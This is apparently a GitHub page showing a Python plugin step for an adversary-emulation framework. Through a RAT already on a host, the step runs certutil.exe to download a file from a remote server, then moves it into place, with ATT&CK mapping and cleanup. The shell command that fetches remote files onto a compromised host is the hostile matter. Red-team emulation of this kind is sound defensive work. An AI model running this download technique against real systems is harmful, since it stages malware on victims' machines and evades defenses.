-
Notifications
You must be signed in to change notification settings - Fork 6
/
certutildownload.py
44 lines (39 loc) · 2.01 KB
/
certutildownload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from plugins.adversary.app.operation.operation import Step, OPSoftware, OPRat, OPVar, OPHost, OPFile
from plugins.adversary.app.commands import *
from plugins.adversary.app.custom import *
class CertutilDownload(Step):
""" Description:
This step downloads a file from a remote web server to the host using certutil.
Based on https://twitter.com/subTee/status/888102593838362624
Requirements:
This step only requires the existence of a RAT on a host in order to run.
"""
display_name = 'certutil_download'
summary = 'Use certutil.exe to download a file from a remote server'
attack_mapping = [('T1140', 'Defense Evasion')]
preconditions = [('rat', OPRat),
('host', OPHost(OPVar('rat.host'))),
('software', OPSoftware({'downloaded': False}))]
postconditions = [('file_g', OPFile),
('software_g', OPSoftware({'downloaded': True}))]
postproperties = ['file_g.path']
significant_parameters = ['host']
@staticmethod
def description(host, software):
return 'Downloading {} via Certutil on {}'.format(software.name, host.fqdn)
@staticmethod
def parser(text):
return (re.search('completed successfully', text) is not None)
@staticmethod
async def action(operation, rat, host, software, file_g, software_g):
filename = get_process(software.download_url)
commands = 'c:\\windows\\system32\\certutil.exe -urlcache -split -f {} && move {} {}'.format(software.download_url, filename, software.download_loc)
successful = (await operation.execute_shell_command(rat, command.CommandLine(['cmd', '/c', '"{}"'.format(commands)]), CertutilDownload.parser))
await file_g({'path': software.download_loc, 'host': host })
software.downloaded = True
await update_software(software_g, software)
return successful
@staticmethod
async def cleanup(cleaner, file_g):
for file in file_g:
await cleaner.delete(file)